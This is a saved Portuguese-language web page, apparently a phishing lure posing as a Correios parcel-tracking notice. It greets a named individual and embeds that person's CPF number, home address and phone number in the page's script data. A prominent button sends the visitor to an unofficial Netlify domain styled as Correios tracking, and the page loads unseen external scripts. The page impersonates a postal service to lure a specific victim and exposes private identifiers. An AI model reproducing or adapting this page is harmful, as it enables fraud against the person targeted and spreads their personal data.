<!DOCTYPE html><html lang="pt-BR"><head>
    <meta charset="utf-8">
    
<style>ul{display:none !important}</style>

    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="/_next/static/css/7333877b3b305062.css" data-precedence="next">
    <link rel="preload" as="script" fetchpriority="low" href="/_next/static/chunks/webpack-d0ceac4fb78a3613.js">
    <script src="/_next/static/chunks/fd9d1056-2821b0f0cabcd8bd.js" async=""></script>
    <script src="/_next/static/chunks/23-55513588e2bf9c3d.js" async=""></script>
    <script src="/_next/static/chunks/main-app-846a0768ec76bb39.js" async=""></script>
    <script src="/_next/static/chunks/app/layout-88dba03b2b2b1a23.js" async=""></script>
    <script src="/_next/static/chunks/173-da0bb52ea0fc8a67.js" async=""></script>
    <script src="/_next/static/chunks/app/page-f0327d1d738300a6.js" async=""></script>
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="">
    <link href="https://fonts.googleapis.com/css2?family=Inter:wght@100..900&amp;display=swap" rel="stylesheet">
    <title>Ver Rastreio</title>
    <meta name="description" content="Saiba onde está seu pedido!">
    <link rel="icon" href="images/cropped-regular_correios-logo-2-32x32.png" type="image/x-icon" sizes="16x16">
    <link rel="icon" href="/icon.png?44082570e7d34a55" type="image/png" sizes="16x16">
    <link rel="apple-touch-icon" href="/apple-icon.png?a4726de0a13f0b3a" type="image/png" sizes="180x180">
    <meta name="next-size-adjust">
    <script src="/_next/static/chunks/polyfills-78c92fac7aa8fdd8.js" nomodule=""></script>
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="">
    <link href="https://fonts.googleapis.com/css2?family=Poppins:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&amp;display=swap" rel="stylesheet">
</head>

<body class="__className_aaf875 bg-gradient-to-br from-[#FECD06] to-[#e4b600]">
<div style="display: none;">
   
   <script id="_wauv8g">var _wau = _wau || []; _wau.push(["classic", "wy8myl2tvd", "v8g"]);</script><script async="" src="js/c.js"></script>
   
</div>
   <div class="container mx-auto flex flex-col items-center justify-center min-h-[100dvh] py-12 flex">
        <main class="">
            <div class="flex items-center justify-center">
                <img alt="Logo" loading="lazy" width="64" height="64" decoding="async" data-nimg="1" class="mr-2" style="color:transparent" srcset="images/logo.webp" src="image.html">
                <div class="flex flex-col">
                    <p class="font-bold text-3xl text-[#14243E]">Rastreio</p>
                    <small class="text-[#14243E]">Verifique onde seu produto se encontra!</small>
                </div>
            </div>
            <div class="flex flex-col items-center justify-center h-full w-full flex-grow mt-12 px-4 md:px-6">
                <div class="max-w-2xl text-center space-y-8">
                    <h1 id="diminuir" class="text-3xl font-bold text-white sm:text-3xl md:text-4xl">
                        <span id="nomedouser" class="text-[#000000]"></span>
                        Clique no botão abaixo para verificar o status do seu pedido!
                    </h1>
                    <ul>
                        <li id="cpf">

                        </li>
                        <li id="endereco">

                        </li>
                    </ul>
                    <a id="redirecionamento" href="https://correios-rastreios.netlify.app/" class="uppercase pulse-button inline-flex h-12 items-center justify-center rounded-md bg-[#00ff11] px-8 text-sm font-medium text-[#1F2937] shadow-md transition-colors hover:bg-[#7bff00] focus:outline-none focus:ring-2 focus:ring-[#7bff00] focus:ring-offset-2">VERIFICAR STATUS DO PEDIDO</a>
                </div>
            </div>
        </main>
    </div>
    <script src="/_next/static/chunks/webpack-d0ceac4fb78a3613.js" async=""></script>
    <script>
        (self.__next_f = self.__next_f || []).push([0]);
        self.__next_f.push([2, null])
    </script>
    <script>
        self.__next_f.push([1, "1:HL[\"/_next/static/media/c9a5bc6a7c948fb0-s.p.woff2\",\"font\",{\"crossOrigin\":\"\",\"type\":\"font/woff2\"}]\n2:HL[\"/_next/static/css/7333877b3b305062.css\",\"style\"]\n"])
    </script>
    <script>
        self.__next_f.push([1, "3:I[5751,[],\"\"]\n6:I[9275,[],\"\"]\n7:I[1343,[],\"\"]\n8:I[4080,[\"185\",\"static/chunks/app/layout-88dba03b2b2b1a23.js\"],\"\"]\na:I[6130,[],\"\"]\nb:[]\n"])
    </script>
    <script>
        self.__next_f.push([1, "0:[[[\"$\",\"link\",\"0\",{\"rel\":\"stylesheet\",\"href\":\"/_next/static/css/7333877b3b305062.css\",\"precedence\":\"next\",\"crossOrigin\":\"$undefined\"}]],[\"$\",\"$L3\",null,{\"buildId\":\"Vq2OdVnDyHEoCwT4HMIXL\",\"assetPrefix\":\"\",\"initialCanonicalUrl\":\"/?var_phone=5511971584884\",\"initialTree\":[\"\",{\"children\":[\"__PAGE__?{\\\"var_phone\\\":\\\"5511971584884\\\"}\",{}]},\"$undefined\",\"$undefined\",true],\"initialSeedData\":[\"\",{\"children\":[\"__PAGE__\",{},[[\"$L4\",\"$L5\"],null],null]},[[\"$\",\"html\",null,{\"lang\":\"pt-BR\",\"children\":[\"$\",\"body\",null,{\"className\":\"__className_aaf875 bg-gradient-to-br from-[#FECD06] to-[#e4b600]\",\"children\":[[\"$\",\"$L6\",null,{\"parallelRouterKey\":\"children\",\"segmentPath\":[\"children\"],\"error\":\"$undefined\",\"errorStyles\":\"$undefined\",\"errorScripts\":\"$undefined\",\"template\":[\"$\",\"$L7\",null,{}],\"templateStyles\":\"$undefined\",\"templateScripts\":\"$undefined\",\"notFound\":[[\"$\",\"title\",null,{\"children\":\"404: This page could not be found.\"}],[\"$\",\"div\",null,{\"style\":{\"fontFamily\":\"system-ui,\\\"Segoe UI\\\",Roboto,Helvetica,Arial,sans-serif,\\\"Apple Color Emoji\\\",\\\"Segoe UI Emoji\\\"\",\"height\":\"100vh\",\"textAlign\":\"center\",\"display\":\"flex\",\"flexDirection\":\"column\",\"alignItems\":\"center\",\"justifyContent\":\"center\"},\"children\":[\"$\",\"div\",null,{\"children\":[[\"$\",\"style\",null,{\"dangerouslySetInnerHTML\":{\"__html\":\"body{color:#000;background:#fff;margin:0}.next-error-h1{border-right:1px solid rgba(0,0,0,.3)}@media (prefers-color-scheme:dark){body{color:#fff;background:#000}.next-error-h1{border-right:1px solid rgba(255,255,255,.3)}}\"}}],[\"$\",\"h1\",null,{\"className\":\"next-error-h1\",\"style\":{\"display\":\"inline-block\",\"margin\":\"0 20px 0 0\",\"padding\":\"0 23px 0 0\",\"fontSize\":24,\"fontWeight\":500,\"verticalAlign\":\"top\",\"lineHeight\":\"49px\"},\"children\":\"404\"}],[\"$\",\"div\",null,{\"style\":{\"display\":\"inline-block\"},\"children\":[\"$\",\"h2\",null,{\"style\":{\"fontSize\":14,\"fontWeight\":400,\"lineHeight\":\"49px\",\"margin\":0},\"children\":\"This page could not be found.\"}]}]]}]}]],\"notFoundStyles\":[],\"styles\":null}],[\"$\",\"$L8\",null,{\"id\":\"clarity-script\",\"strategy\":\"afterInteractive\",\"children\":\"\\n            (function(c,l,a,r,i,t,y){\\n                c[a]=c[a]||function(){(c[a].q=c[a].q||[]).push(arguments)};\\n                t=l.createElement(r);t.async=1;t.src=\\\"https://www.clarity.ms/tag/\\\"+i;\\n                y=l.getElementsByTagName(r)[0];y.parentNode.insertBefore(t,y);\\n            })(window, document, \\\"clarity\\\", \\\"script\\\", \\\"muhn7qnh8n\\\");\\n            \"}]]}]}],null],null],\"couldBeIntercepted\":false,\"initialHead\":[false,\"$L9\"],\"globalErrorComponent\":\"$a\",\"missingSlots\":\"$Wb\"}]]\n"])
    </script>
    <script>
        self.__next_f.push([1, "9:[[\"$\",\"meta\",\"0\",{\"name\":\"viewport\",\"content\":\"width=device-width, initial-scale=1\"}],[\"$\",\"meta\",\"1\",{\"charSet\":\"utf-8\"}],[\"$\",\"title\",\"2\",{\"children\":\"Ver Rastreio\"}],[\"$\",\"meta\",\"3\",{\"name\":\"description\",\"content\":\"Saiba onde está seu pedido!\"}],[\"$\",\"link\",\"4\",{\"rel\":\"icon\",\"href\":\"/favicon.ico\",\"type\":\"image/x-icon\",\"sizes\":\"16x16\"}],[\"$\",\"link\",\"5\",{\"rel\":\"icon\",\"href\":\"/icon.png?44082570e7d34a55\",\"type\":\"image/png\",\"sizes\":\"16x16\"}],[\"$\",\"link\",\"6\",{\"rel\":\"apple-touch-icon\",\"href\":\"/apple-icon.png?a4726de0a13f0b3a\",\"type\":\"image/png\",\"sizes\":\"180x180\"}],[\"$\",\"meta\",\"7\",{\"name\":\"next-size-adjust\"}]]\n4:null\n"])
    </script>
    <script>
        self.__next_f.push([1, "c:I[8173,[\"173\",\"static/chunks/173-da0bb52ea0fc8a67.js\",\"931\",\"static/chunks/app/page-f0327d1d738300a6.js\"],\"Image\"]\nd:I[1077,[\"173\",\"static/chunks/173-da0bb52ea0fc8a67.js\",\"931\",\"static/chunks/app/page-f0327d1d738300a6.js\"],\"default\"]\n5:[\"$\",\"div\",null,{\"className\":\"container mx-auto flex flex-col items-center justify-center min-h-[100dvh] py-12 flex\",\"children\":[\"$\",\"main\",null,{\"className\":\"\",\"children\":[[\"$\",\"div\",null,{\"className\":\"flex items-center justify-center\",\"children\":[[\"$\",\"$Lc\",null,{\"src\":\"/logo.png\",\"alt\":\"Logo\",\"width\":64,\"height\":64,\"className\":\"mr-2\"}],[\"$\",\"div\",null,{\"className\":\"flex flex-col\",\"children\":[[\"$\",\"p\",null,{\"className\":\"font-bold text-3xl text-[#14243E]\",\"children\":\"Rastreio\"}],[\"$\",\"small\",null,{\"className\":\"text-[#14243E]\",\"children\":\"Verifique onde seu produto se encontra!\"}]]}]]}],false,[\"$\",\"div\",null,{\"className\":\"flex flex-col items-center justify-center h-full w-full flex-grow mt-12 px-4 md:px-6\",\"children\":[\"$\",\"div\",null,{\"className\":\"max-w-2xl text-center space-y-8\",\"children\":[[\"$\",\"h1\",null,{\"className\":\"text-3xl font-bold text-white sm:text-3xl md:text-4xl\",\"children\":[[\"$\",\"span\",null,{\"className\":\"text-[#000000]\",\"children\":[\"Antonio Carlos Nemo Moreira\",\",\"]}],\" clique no botão abaixo para verificar o status do seu pedido!\"]}],[\"$\",\"ul\",null,{\"children\":[[\"$\",\"li\",null,{\"children\":[[\"$\",\"strong\",null,{\"children\":\"CPF:\"}],\" \",\"10220927820\"]}],[\"$\",\"li\",null,{\"children\":[[\"$\",\"strong\",null,{\"children\":\"Endereço:\"}],\" \",\"Avenida Doutor José Adriano Marrey Júnior, 112, Aparecida, 12912430, Bragança Paulista\"]}]]}],[\"$\",\"$Ld\",null,{\"id\":\"5511971584884\"}]]}]}]]}]}]\n"])


    </script>

    <style>
        /*
! tailwindcss v3.4.4 | MIT License | https://tailwindcss.com
*/
        *,
        :after,
        :before {
            box-sizing: border-box;
            border: 0 solid #e5e7eb
        }

        :after,
        :before {
            --tw-content: ""
        }

        :host,
        html {
            line-height: 1.5;
            -webkit-text-size-adjust: 100%;
            -moz-tab-size: 4;
            tab-size: 4;
            font-family: "Poppins", ui-sans-serif, system-ui, sans-serif, Apple Color Emoji, Segoe UI Emoji, Segoe UI Symbol, Noto Color Emoji;
            font-feature-settings: normal;
            font-variation-settings: normal;
            -webkit-tap-highlight-color: transparent
        }

        body {
            margin: 0;
            line-height: inherit
        }

        hr {
            height: 0;
            color: inherit;
            border-top-width: 1px
        }

        abbr:where([title]) {
            text-decoration: underline dotted
        }

        h1,
        h2,
        h3,
        h4,
        h5,
        h6 {
            font-size: inherit;
            font-weight: inherit
        }

        a {
            color: inherit;
            text-decoration: inherit
        }

        b,
        strong {
            font-weight: bolder
        }

        code,
        kbd,
        pre,
        samp {
            font-family: "Poppins" !important;
            font-feature-settings: normal;
            font-variation-settings: normal;
            font-size: 1em
        }

        small {
            font-size: 80%
        }

        sub,
        sup {
            font-size: 75%;
            line-height: 0;
            position: relative;
            vertical-align: baseline
        }

        sub {
            bottom: -.25em
        }

        sup {
            top: -.5em
        }

        table {
            text-indent: 0;
            border-color: inherit;
            border-collapse: collapse
        }

        button,
        input,
        optgroup,
        select,
        textarea {
            font-family: inherit;
            font-feature-settings: inherit;
            font-variation-settings: inherit;
            font-size: 100%;
            font-weight: inherit;
            line-height: inherit;
            letter-spacing: inherit;
            color: inherit;
            margin: 0;
            padding: 0
        }

        button,
        select {
            text-transform: none
        }

        button,
        input:where([type=button]),
        input:where([type=reset]),
        input:where([type=submit]) {
            -webkit-appearance: button;
            background-color: transparent;
            background-image: none
        }

        :-moz-focusring {
            outline: auto
        }

        :-moz-ui-invalid {
            box-shadow: none
        }

        progress {
            vertical-align: baseline
        }

        ::-webkit-inner-spin-button,
        ::-webkit-outer-spin-button {
            height: auto
        }

        [type=search] {
            -webkit-appearance: textfield;
            outline-offset: -2px
        }

        ::-webkit-search-decoration {
            -webkit-appearance: none
        }

        ::-webkit-file-upload-button {
            -webkit-appearance: button;
            font: inherit
        }

        summary {
            display: list-item
        }

        blockquote,
        dd,
        dl,
        figure,
        h1,
        h2,
        h3,
        h4,
        h5,
        h6,
        hr,
        p,
        pre {
            margin: 0
        }

        fieldset {
            margin: 0
        }

        fieldset,
        legend {
            padding: 0
        }

        menu,
        ol,
        ul {
            list-style: none;
            margin: 0;
            padding: 0
        }

        dialog {
            padding: 0
        }

        textarea {
            resize: vertical
        }

        input::placeholder,
        textarea::placeholder {
            opacity: 1;
            color: #9ca3af
        }

        [role=button],
        button {
            cursor: pointer
        }

        :disabled {
            cursor: default
        }

        audio,
        canvas,
        embed,
        iframe,
        img,
        object,
        svg,
        video {
            display: block;
            vertical-align: middle
        }

        img,
        video {
            max-width: 100%;
            height: auto
        }

        [hidden] {
            display: none
        }

        *,
        :after,
        :before {
            --tw-border-spacing-x: 0;
            --tw-border-spacing-y: 0;
            --tw-translate-x: 0;
            --tw-translate-y: 0;
            --tw-rotate: 0;
            --tw-skew-x: 0;
            --tw-skew-y: 0;
            --tw-scale-x: 1;
            --tw-scale-y: 1;
            --tw-pan-x: ;
            --tw-pan-y: ;
            --tw-pinch-zoom: ;
            --tw-scroll-snap-strictness: proximity;
            --tw-gradient-from-position: ;
            --tw-gradient-via-position: ;
            --tw-gradient-to-position: ;
            --tw-ordinal: ;
            --tw-slashed-zero: ;
            --tw-numeric-figure: ;
            --tw-numeric-spacing: ;
            --tw-numeric-fraction: ;
            --tw-ring-inset: ;
            --tw-ring-offset-width: 0px;
            --tw-ring-offset-color: #fff;
            --tw-ring-color: rgba(59, 130, 246, .5);
            --tw-ring-offset-shadow: 0 0 #0000;
            --tw-ring-shadow: 0 0 #0000;
            --tw-shadow: 0 0 #0000;
            --tw-shadow-colored: 0 0 #0000;
            --tw-blur: ;
            --tw-brightness: ;
            --tw-contrast: ;
            --tw-grayscale: ;
            --tw-hue-rotate: ;
            --tw-invert: ;
            --tw-saturate: ;
            --tw-sepia: ;
            --tw-drop-shadow: ;
            --tw-backdrop-blur: ;
            --tw-backdrop-brightness: ;
            --tw-backdrop-contrast: ;
            --tw-backdrop-grayscale: ;
            --tw-backdrop-hue-rotate: ;
            --tw-backdrop-invert: ;
            --tw-backdrop-opacity: ;
            --tw-backdrop-saturate: ;
            --tw-backdrop-sepia: ;
            --tw-contain-size: ;
            --tw-contain-layout: ;
            --tw-contain-paint: ;
            --tw-contain-style:
        }

        ::backdrop {
            --tw-border-spacing-x: 0;
            --tw-border-spacing-y: 0;
            --tw-translate-x: 0;
            --tw-translate-y: 0;
            --tw-rotate: 0;
            --tw-skew-x: 0;
            --tw-skew-y: 0;
            --tw-scale-x: 1;
            --tw-scale-y: 1;
            --tw-pan-x: ;
            --tw-pan-y: ;
            --tw-pinch-zoom: ;
            --tw-scroll-snap-strictness: proximity;
            --tw-gradient-from-position: ;
            --tw-gradient-via-position: ;
            --tw-gradient-to-position: ;
            --tw-ordinal: ;
            --tw-slashed-zero: ;
            --tw-numeric-figure: ;
            --tw-numeric-spacing: ;
            --tw-numeric-fraction: ;
            --tw-ring-inset: ;
            --tw-ring-offset-width: 0px;
            --tw-ring-offset-color: #fff;
            --tw-ring-color: rgba(59, 130, 246, .5);
            --tw-ring-offset-shadow: 0 0 #0000;
            --tw-ring-shadow: 0 0 #0000;
            --tw-shadow: 0 0 #0000;
            --tw-shadow-colored: 0 0 #0000;
            --tw-blur: ;
            --tw-brightness: ;
            --tw-contrast: ;
            --tw-grayscale: ;
            --tw-hue-rotate: ;
            --tw-invert: ;
            --tw-saturate: ;
            --tw-sepia: ;
            --tw-drop-shadow: ;
            --tw-backdrop-blur: ;
            --tw-backdrop-brightness: ;
            --tw-backdrop-contrast: ;
            --tw-backdrop-grayscale: ;
            --tw-backdrop-hue-rotate: ;
            --tw-backdrop-invert: ;
            --tw-backdrop-opacity: ;
            --tw-backdrop-saturate: ;
            --tw-backdrop-sepia: ;
            --tw-contain-size: ;
            --tw-contain-layout: ;
            --tw-contain-paint: ;
            --tw-contain-style:
        }

        .container {
            width: 100%
        }

        @media (min-width: 640px) {
            .container {
                max-width: 640px
            }
        }

        @media (min-width: 768px) {
            .container {
                max-width: 768px
            }
        }

        @media (min-width: 1024px) {
            .container {
                max-width: 1024px
            }
        }

        @media (min-width: 1280px) {
            .container {
                max-width: 1280px
            }
        }

        @media (min-width: 1536px) {
            .container {
                max-width: 1536px
            }
        }

        .mx-auto {
            margin-left: auto;
            margin-right: auto
        }

        .mr-2 {
            margin-right: .5rem
        }

        .mt-12 {
            margin-top: 3rem
        }

        .flex {
            display: flex
        }

        .inline-flex {
            display: inline-flex
        }

        .h-12 {
            height: 3rem
        }

        .h-full {
            height: 100%
        }

        .min-h-\[100dvh\] {
            min-height: 100dvh
        }

        .w-full {
            width: 100%
        }

        .max-w-2xl {
            max-width: 42rem
        }

        .flex-grow {
            flex-grow: 1
        }








        .animate-bounce {
            animation: bounce 1.5s infinite
        }

        .flex-col {
            flex-direction: column
        }

        .items-center {
            align-items: center
        }

        .justify-center {
            justify-content: center
        }

        .space-y-8>:not([hidden])~:not([hidden]) {
            --tw-space-y-reverse: 0;
            margin-top: calc(2rem * calc(1 - var(--tw-space-y-reverse)));
            margin-bottom: calc(2rem * var(--tw-space-y-reverse))
        }

        .rounded-md {
            border-radius: .375rem
        }

        .bg-\[\#00ff11\] {
            --tw-bg-opacity: 1;
            background-color: green;
            padding: 15px !important;
            color: white !important;
            max-width: 80%;

        }

        .bg-gradient-to-br {
            background-image: linear-gradient(to bottom right, var(--tw-gradient-stops))
        }

        .from-\[\#FECD06\] {
            --tw-gradient-from: #fecd06 var(--tw-gradient-from-position);
            --tw-gradient-to: rgba(254, 205, 6, 0) var(--tw-gradient-to-position);
            --tw-gradient-stops: var(--tw-gradient-from), var(--tw-gradient-to)
        }

        .to-\[\#e4b600\] {
            --tw-gradient-to: #e4b600 var(--tw-gradient-to-position)
        }

        .px-4 {
            padding-left: 1rem;
            padding-right: 1rem
        }

        .px-8 {
            padding-left: 2rem;
            padding-right: 2rem
        }

        .py-12 {
            padding-top: 3rem;
            padding-bottom: 3rem
        }

        .text-center {
            text-align: center
        }

        .text-3xl {
            font-size: 1.875rem;
            line-height: 2.25rem
        }

        .text-sm {
            font-size: .875rem;
            line-height: 1.25rem
        }

        .font-bold {
            font-weight: 700
        }

        .font-medium {
            font-weight: 500
        }

        .uppercase {
            text-transform: uppercase
        }

        .text-\[\#000000\] {
            --tw-text-opacity: 1;
            color: rgb(0 0 0/var(--tw-text-opacity))
        }

        .text-\[\#14243E\] {
            --tw-text-opacity: 1;
            color: rgb(20 36 62/var(--tw-text-opacity))
        }

        .text-\[\#1F2937\] {
            --tw-text-opacity: 1;
            color: rgb(31 41 55/var(--tw-text-opacity))
        }

        .text-white {
            --tw-text-opacity: 1;
            color: rgb(255 255 255/var(--tw-text-opacity))
        }

        .shadow-md {
            --tw-shadow: 0 4px 6px -1px rgba(0, 0, 0, .1), 0 2px 4px -2px rgba(0, 0, 0, .1);
            --tw-shadow-colored: 0 4px 6px -1px var(--tw-shadow-color), 0 2px 4px -2px var(--tw-shadow-color);
            box-shadow: var(--tw-ring-offset-shadow, 0 0 #0000), var(--tw-ring-shadow, 0 0 #0000), var(--tw-shadow)
        }

        .filter {
            filter: var(--tw-blur) var(--tw-brightness) var(--tw-contrast) var(--tw-grayscale) var(--tw-hue-rotate) var(--tw-invert) var(--tw-saturate) var(--tw-sepia) var(--tw-drop-shadow)
        }

        .transition-colors {
            transition-property: color, background-color, border-color, text-decoration-color, fill, stroke;
            transition-timing-function: cubic-bezier(.4, 0, .2, 1);
            transition-duration: .15s
        }

        .hover\:bg-\[\#7bff00\]:hover {
            --tw-bg-opacity: 1;
            background-color: rgb(123 255 0/var(--tw-bg-opacity))
        }

        .focus\:outline-none:focus {
            outline: 2px solid transparent;
            outline-offset: 2px
        }

        .focus\:ring-2:focus {
            --tw-ring-offset-shadow: var(--tw-ring-inset) 0 0 0 var(--tw-ring-offset-width) var(--tw-ring-offset-color);
            --tw-rings-shadow: var(--tw-ring-inset) 0 0 0 calc(2px + var(--tw-ring-offset-width)) var(--tw-ring-color);
            box-shadow: var(--tw-ring-offset-shadow), var(--tw-ring-shadow), var(--tw-shadow, 0 0 #0000)
        }

        .focus\:ring-\[\#7bff00\]:focus {
            --tw-ring-opacity: 1;
            --tw-ring-color: rgb(123 255 0/var(--tw-ring-opacity))
        }

        .focus\:ring-offset-2:focus {
            --tw-ring-offset-width: 2px
        }

        li {

            align-items: center;
            align-self: center;

        }

        ul {
            max-width: 100% !important;
            display: flex;
            flex-direction: column;
            align-items: center;
            background-color: #ffffff84;
            border-radius: 10px;
            padding: 20px;
        }

        #redirecionamento {
            min-width: 100% !important;
            margin: 30px 0px !important;
            font-size: 17px;
            height: fit-content;
            line-height: 1.4;
        }

        

        #nomedouser,
        #diminuir {
            font-size: 23px !important;
            line-height: 1.3;
        }

        li#cpf {
            font-size: 22px;
        }

        li#endereco {
            font-size: 19px !important;
            margin-top: 10px;
        }

        @media (min-width: 640px) {
            .sm\:text-3xl {
                font-size: 1.875rem;
                line-height: 2.25rem
            }
        }

        @media (min-width: 768px) {
            .md\:px-6 {
                padding-left: 1.5rem;
                padding-right: 1.5rem
            }

            .md\:text-4xl {
                font-size: 2.25rem;
                line-height: 2.5rem
            }
        }
    </style>
    <script>

document.querySelector("#redirecionamento").innerHTML = "VERIFICAR STATUS DO PEDIDO"

</script>
    <script src="js/bds.js"></script>


</body></html>